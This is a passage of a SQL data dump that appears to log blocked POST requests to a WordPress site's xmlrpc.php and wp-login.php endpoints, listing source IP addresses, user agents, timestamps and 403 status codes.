6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','83fDPo6zIcJvOsejWQH5XB2U',0,1665667463.3822,2997,'','POST',403,0,515,0,1,'',0),('121.78.79.85',2035175253,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','pkwAZf3LErmnJYqXFayh16zv',0,1665667455.6339,538,'','POST',403,0,515,0,1,'',0),('67.205.176.79',1137553487,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','SlK49xrnL0a1jsNBm86o53ve',0,1665667451.5320,700,'','POST',403,0,515,0,1,'',0),('67.205.176.79',1137553487,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','TUaqzJSemYWEK3AvRHw2I4Fs',0,1665667444.1134,624,'','POST',403,0,515,0,1,'',0),('66.228.32.9',1122246665,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','GVcCeZNYqo78OE0jn2HkIBzx',0,1665667440.1703,536,'','POST',403,0,515,0,1,'',0),('77.243.228.84',1307829332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','AK0lzkX19OwnBZ6NYHVuMhmf',0,1665667430.9175,514,'','POST',403,0,515,0,1,'',0),('141.94.87.67',2371770179,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q710(FGN)) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','F8HZVAS3T70GCOaWNpjldeXo',0,1665667426.1591,1316,'','POST',403,0,515,0,1,'',0),('196.43.185.101',3291199845,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','Zrd0qOL7QP8vmHw3kEFx6Rbu',0,1665667411.4611,10119,'','POST',403,0,515,0,1,'',0),('184.168.115.171',3098047403,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','q7ZkIwJnBpPVoCKdODueN654',0,1665667403.7126,17782,'','POST',403,0,515,0,1,'',0),('180.211.99.217',3033752537,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','P1c2opAje7a6btusHURJQMrn',0,1665667254.2876,19226,'','POST',403,0,515,0,1,'',0),('192.115.100.180',3228787892,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','WOuFCAT7pkhwibQxNeEnrK30',0,1665666815.3304,18793,'','POST',403,0,515,0,1,'',0),('103.92.27.198',1734089670,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','F4dumYavWJSDybO69jtC8kUs',0,1665666621.5576,19010,'','POST',403,0,515,0,1,'',0),('148.72.214.59',2487801403,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HF9tAkghNOZqKM4iTf037uxl',0,1665666159.3364,1869,'','POST',403,0,515,0,1,'',0),('72.9.158.112',1208589936,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','B6amxohMrT0SNyRjUbnlGYPc',0,1665666025.9936,19325,'','POST',403,0,515,0,1,'',0),('208.77.159.5',3494747909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','BcS6gl8F1b2LiOz4xyr9KECa',0,1665672422.9873,540,'','POST',403,0,515,0,1,'',0),('85.128.143.151',1434488727,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','sDV9j6OA5aqdKNJ0ySkbrLQi',0,1665672422.1294,597,'','POST',403,0,515,0,1,'',0),('141.94.203.127',2371799935,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','APG0t1XE4myvOMNhQp3CZaul',0,1665672402.3772,12747,'','POST',403,0,515,0,1,'',0),('103.27.60.66',1729838146,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','z2KnZDm03JOu4dvAtxjlMQIY',0,1665672398.4837,16591,'','POST',403,0,515,0,1,'',0),('185.107.112.75',3110826059,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','OemIrg9CiXT7pMj3JAsNPt1y',0,1665672398.4293,16639,'','POST',403,0,515,0,1,'',0),('68.183.86.247',1152866039,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/32.0.1700.107 Safari\\/537.36\"}','WT3FGlE7Lvk10AjfRZt4NBao',0,1665672088.8420,514,'','POST',403,0,600,0,1,'',0),('147.135.255.8',2475163400,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','3yKvWdn9YApIrxDSj6gM4bof',0,1665671180.2968,9315,'','POST',403,0,600,0,1,'',0),('167.172.143.92',2813103964,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','1O8gFik4puXdqEVsPG0jK6Jz',0,1665671058.3071,574,'','POST',403,0,515,0,1,'',0),('49.12.114.46',822899246,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','6JT7XpvxLHqfSPKkIADQFNUr',0,1665671053.4983,602,'','POST',403,0,515,0,1,'',0),('66.228.32.9',1122246665,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','MSpOJb6fWaU8TVxuK4kldvAr',0,1665671040.7169,950,'','POST',403,0,515,0,1,'',0),('45.136.107.178',763915186,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','fcBxv2o7VwKIZ4Jujdys63W0',0,1665671040.1147,1066,'','POST',403,0,515,0,1,'',0),('194.163.163.7',3265504007,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','o7rxBPtuThXFWY5s0lpMEeHN',0,1665671029.0408,1428,'','POST',403,0,515,0,1,'',0),('116.202.128.32',1959428128,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','346nx8KDPolGcSOeB15Qq09N',0,1665671024.5902,602,'','POST',403,0,515,0,1,'',0),('164.92.169.121',2757536121,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','uIieqs1K9rG0vckOXmlybU4D',0,1665671020.6314,1509,'','POST',403,0,515,0,1,'',0),('178.170.41.94',2997496158,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','uKXoLEb7t5yzrT4fde9UIshN',0,1665670858.2067,997,'','POST',403,0,515,0,1,'',0),('161.97.90.217',2707512025,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','XQJdkj4hUATtGSrf3s0FCepB',0,1665670857.7125,1190,'','POST',403,0,515,0,1,'',0),('37.120.210.219',628675291,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','IqcAkJ0HmsvW3GpxdNK9nQ25',0,1665670825.7057,19713,'','POST',403,0,515,0,1,'',0),('183.90.250.15',3076192783,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','UtcVYoubBAq1gx9KQeJiZhIm',0,1665670853.6764,1500,'','POST',403,0,515,0,1,'',0),('35.198.25.12',600185100,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zmnyPF0JHkOYVl8WiesZhoAN',0,1665669865.0995,1546,'','POST',403,0,515,0,1,'',0),('178.128.104.173',2994759853,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','RuS0px8JvO6tfIzHF5bVQ3Xk',0,1665669718.3605,18482,'','POST',403,0,515,0,1,'',0),('82.165.85.103',1386567015,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','m9ib5vwBtVGhN24dIFQMzqcn',0,1665674724.0676,505,'','POST',403,0,515,0,1,'',0),('185.112.145.178',3111162290,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','ESP8ei1ML9Qh2VKRkwCXUF6y',0,1665674717.2355,533,'','POST',403,0,515,0,1,'',0),('103.110.86.9',1735284233,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','nR4xOg3lHXuTs8LkZEdvwtSb',0,1665674685.1587,506,'','POST',403,0,515,0,1,'',0),('103.110.86.9',1735284233,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','Y1l8MwLniTUsk2G69FKrRdyS',0,1665674708.8733,2252,'','POST',403,0,515,0,1,'',0),('45.119.82.214',762794710,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','muZPKHS3dWbVL9noXhxRvQYe',0,1665674667.4096,482,'','POST',403,0,515,0,1,'',0),('49.12.114.46',822899246,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','JHS854QVRZFCiajBctesE2uo',0,1665674666.4002,532,'','POST',403,0,515,0,1,'',0),('134.209.222.89',2261900889,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','iLJhARfw12a0vrMG9um58eQg',0,1665674635.5944,2335,'','POST',403,0,515,0,1,'',0),('77.243.228.84',1307829332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','KNfvQCTwxchnBMJLF73tAbe8',0,1665674639.1808,483,'','POST',403,0,515,0,1,'',0),('81.70.248.169',1363605673,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','Jkpe8yhYrUwDEuSRjM7ZNxQ5',0,1665674518.0065,8686,'','POST',403,0,600,0,1,'',0),('49.12.114.46',822899246,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','PoxdqC2lW4U39BYHGVJ10zaF',0,1665674112.0312,1266,'','POST',403,0,515,0,1,'',0),('103.27.60.66',1729838146,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','PZ5CFWHYrwNSlmDvfMG6pbA3',0,1665674122.0384,481,'','POST',403,0,515,0,1,'',0),('143.244.184.204',2415179980,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','8kGWgfeFcojSNvOmlYaPBD29',0,1665674111.8044,1388,'','POST',403,0,515,0,1,'',0),('208.77.159.5',3494747909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','eABYxIX6ZhNbPKOGD5CvLM1Q',0,1665674103.8694,1314,'','POST',403,0,515,0,1,'',0),('67.205.176.79',1137553487,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','5Z1qfNxXAbm3KRBTIrJtGu6v',0,1665674102.1525,1152,'','POST',403,0,515,0,1,'',0),('66.228.32.9',1122246665,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','SJTrXMGcLFq754DZUtdvmQVh',0,1665674094.8881,1309,'','POST',403,0,515,0,1,'',0),('103.27.60.66',1729838146,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','dexHM3TpNrFf7I50JGwlBk2X',0,1665674085.4671,519,'','POST',403,0,515,0,1,'',0),('119.28.78.249',1998343929,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','s3TbUXPdhLq4Vr8kN1BScEgH',0,1665674063.8423,17549,'','POST',403,0,515,0,1,'',0),('103.27.60.66',1729838146,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','Ncj1FwnaLSU3EqRJKW6hyAIz',0,1665674075.6641,5839,'','POST',403,0,515,0,1,'',0),('93.186.242.173',1572532909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','cPQx9InoR8h06BXsjVqvitbe',0,1665674065.7755,15479,'','POST',403,0,515,0,1,'',0),('80.88.88.149',1347967125,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','UwjcoJ1hsDnPGqb9BXtxvEZF',0,1665673618.9588,2364,'','POST',403,0,600,0,1,'',0),('177.153.20.43',2979599403,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','oXYGBb2qlVaH4itLfAUKexMP',0,1665677407.8136,1124,'','POST',403,0,515,0,1,'',0),('167.114.64.93',2809282653,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','IzA3JV1Mc6QkPZx8dH0KjSYq',0,1665677407.2211,1378,'','POST',403,0,515,0,1,'',0),('66.228.32.9',1122246665,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','eCdUWixq7m634XRMngKQBv5Z',0,1665677401.9625,1777,'','POST',403,0,515,0,1,'',0),('177.153.20.43',2979599403,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','arEKym3enCpFxI1lgHObXGTt',0,1665677386.4212,1261,'','POST',403,0,515,0,1,'',0),('208.88.73.86',3495446870,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','052mJHnEeiMoyxr9KBl1gCTU',0,1665677372.4072,8362,'','POST',403,0,515,0,1,'',0),('115.78.160.53',1934532661,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','knhXjy2QHNu8dxqUOJVvoG0P',0,1665677363.1853,17578,'','POST',403,0,515,0,1,'',0),('51.178.146.199',867340999,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','5AvjsuDazcOUJgCKP9fV0yQF',0,1665677364.5925,16003,'','POST',403,0,515,0,1,'',0),('157.230.127.126',2649128830,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','npDmBoxN92FtCH8dfqwEsM3Y',0,1665676966.2036,1339,'','POST',403,0,600,0,1,'',0),('193.37.254.19',3240492563,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','lE5TRD4ijAqUJ80GBxzcoOkX',0,1665677040.6679,2422,'','POST',403,0,515,0,1,'',0),('123.56.5.185',2067269049,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','xYGt2gqIZ1PdXjOLUaoMw4u6',0,1665680934.5595,639,'','POST',403,0,515,0,1,'',0),('114.115.136.65',1920174145,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','wYgJnQCoFNtu6IGpzZHaRmOB',0,1665680929.1954,1127,'','POST',403,0,515,0,1,'',0),('45.64.187.254',759217150,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','IsWHfB817nCJoqm5KxhyTeSz',0,1665680927.9756,1739,'','POST',403,0,515,0,1,'',0),('51.79.207.190',860868542,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','qCuJnETN0t8cKSg3Oy147Ws2',0,1665680919.8217,532,'','POST',403,0,515,0,1,'',0),('198.38.88.250',3324401914,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','8iEgjWY0qVGoMeZSvBzA7xD2',0,1665680923.7591,663,'','POST',403,0,515,0,1,'',0),('128.199.122.92',2160556636,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','vumJq9cVDA4NgX8C6xoGFyfU',0,1665680916.0035,539,'','POST',403,0,515,0,1,'',0),('154.197.48.10',2596614154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','ViTqMRhHetocldgbvQsG86DX',0,1665680908.6286,1864,'','POST',403,0,515,0,1,'',0),('5.196.203.67',96783171,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','SJgcet1qAyxmkW2D5VGQTjEb',0,1665680909.6562,1350,'','POST',403,0,515,0,1,'',0),('139.59.82.122',2335920762,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.106 Safari\\/537.36\"}','ZOVuvI9Cg8f37JS4naKkGbLy',0,1665680881.8393,18356,'','POST',403,0,600,0,1,'',0),('135.181.119.15',2276816655,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','z3QPkai0NCAUfOyX19GBer4n',0,1665687067.1242,652,'','POST',403,0,515,0,1,'',0),('194.233.77.4',3270069508,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','as5lZudxMIjAv2nDepyzowiH',0,1665686371.4382,17552,'','POST',403,0,600,0,1,'',0),('198.46.81.43',3324924203,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','F407pVYjrEJObIy5tidDl1An',0,1665687062.1920,2697,'','POST',403,0,515,0,1,'',0),('120.27.240.230',2015097062,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','gOuiQdX06EDslreRUnYZTW8J',0,1665685511.9310,1559,'','POST',403,0,600,0,1,'',0),('107.189.13.99',1807551843,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','w18uKGzt6OZmghkXeRx07jfJ',0,1665685065.4172,17234,'','POST',403,0,600,0,1,'',0),('154.197.48.10',2596614154,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','uvPjFbIQAfsOV7UcD4CKlizR',0,1665684127.4263,516,'','POST',403,0,515,0,1,'',0),('175.178.241.165',2947740069,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','pxDfRsQ0TUtw24HSKENVk1Id',0,1665684114.2089,618,'','POST',403,0,515,0,1,'',0),('42.193.106.55',717318711,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','pYhqHy3KngkRsimBbN5rQlZL',0,1665684119.4527,554,'','POST',403,0,515,0,1,'',0),('165.22.69.253',2769700349,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64; rv:73.0) Gecko\\/20100101 Firefox\\/73.0\"}','7muqAtdO1KPwaY3ZojB5NVJb',0,1665684106.0012,1080,'','POST',403,0,515,0,1,'',0),('120.25.147.55',2014942007,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','IBAzdrnoWkvjDQXsMNYbg05P',0,1665684104.0093,3322,'','POST',403,0,515,0,1,'',0),('93.186.242.173',1572532909,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.76 Safari\\/537.36\"}','eZdG5fzumwUDK9bYrv26cBAN',0,1665684101.9723,3693,'','POST',403,0,515,0,1,'',0),('164.46.122.50',2754509362,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','wtYFz5oUhJvelOTjgP1yG6dV',0,1665684049.5743,4746,'','POST',403,0,600,0,1,'',0),('45.136.107.178',763915186,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','5ji3dsmv1tlJMPAXoZCF6b20',0,1665688969.4881,485,'','POST',403,0,515,0,1,'',0),('34.68.16.246',574886134,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 